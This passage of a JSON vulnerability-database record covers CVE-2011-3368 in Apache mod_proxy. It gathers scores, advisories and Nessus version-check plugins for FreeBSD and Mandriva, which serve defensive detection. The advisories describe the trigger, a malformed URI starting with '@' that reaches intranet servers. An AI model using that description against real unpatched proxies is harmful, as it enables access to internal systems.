incomplete for 0.9 http requests.\n", "cvss3": {}, "published": "2011-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2011-3368", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-05T00:00:00", "id": "UB:CVE-2011-3368", "href": "https://ubuntu.com/security/CVE-2011-3368", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:31:57", "description": "An information disclosure vulnerability has been reported in Apache httpd server. The vulnerability is due to insufficient input validation by the server while using the RewriteRule or ProxyPassMatch directives. A remote attacker may exploit this vulnerability by sending a series of specially crafted requests to an affected httpd server. 
Successful exploitation would allow an attacker to read data which was not intended to be disclosed from the server.", "cvss3": {}, "published": "2011-11-01T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTPD mod_proxy Information Disclosure (CVE-2011-3368)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-11-01T00:00:00", "id": "CPAI-2011-483", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-05T07:45:57", "description": "A security bypass vulnerability has been reported in Apache HTTP Server.", "cvss3": {}, "published": "2012-03-05T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTPD mod_proxy Security Bypass (CVE-2011-3368)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2022-07-05T00:00:00", "id": "CPAI-2012-077", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-10-16T02:26:05", "description": "Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. 
There is no patch against this issue!", "cvss3": {"score": null, "vector": null}, "published": "2011-11-15T00:00:00", "type": "nessus", "title": "FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache", "p-cpe:/a:freebsd:freebsd:apache%2bipv6", "p-cpe:/a:freebsd:freebsd:apache%2bmod_perl", "p-cpe:/a:freebsd:freebsd:apache%2bmod_ssl", "p-cpe:/a:freebsd:freebsd:apache%2bmod_ssl%2bipv6", "p-cpe:/a:freebsd:freebsd:apache%2bssl", "p-cpe:/a:freebsd:freebsd:ru-apache%2bmod_ssl", "p-cpe:/a:freebsd:freebsd:ru-apache-1.3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/56816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56816);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n\n script_name(english:\"FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. 
In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. There is no patch against\nthis issue!\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://httpd.apache.org/security/vulnerabilities_13.html\"\n );\n # http://seclists.org/fulldisclosure/2011/Oct/232\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2011/Oct/232\"\n );\n # https://vuxml.freebsd.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60d9264c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache+ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-apache-1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/14\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ssl<1.3.43.1.59_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+ipv6<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_perl<1.3.43\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache+mod_ssl+ipv6<1.3.41+2.8.31_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache-1.3<1.3.43+30.23_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-apache+mod_ssl<1.3.43+30.23_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:45", "description": "A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) 
ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-10T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2011:144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_userdir", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-source", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": 
"MANDRIVA_MDVSA-2011-144.NASL", "href": "https://www.tenable.com/plugins/nessus/56428", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:144. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56428);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2011:144)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in apache :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial \\@ (at sign) character (CVE-2011-3368).\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. 
Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149 products_id=490\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-base-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-devel-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-htcacheclean-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_authn_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dav-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dbd-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_deflate-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_disk_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_file_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ldap-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_mem_cache-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ssl-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_userdir-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-modules-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-event-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-itk-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-peruser-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-prefork-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-worker-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-source-2.2.9-12.13mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", 
reference:\"apache-mod_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.4mdv2010.2\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.4mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-htcacheclean-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", 
reference:\"apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.2-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", 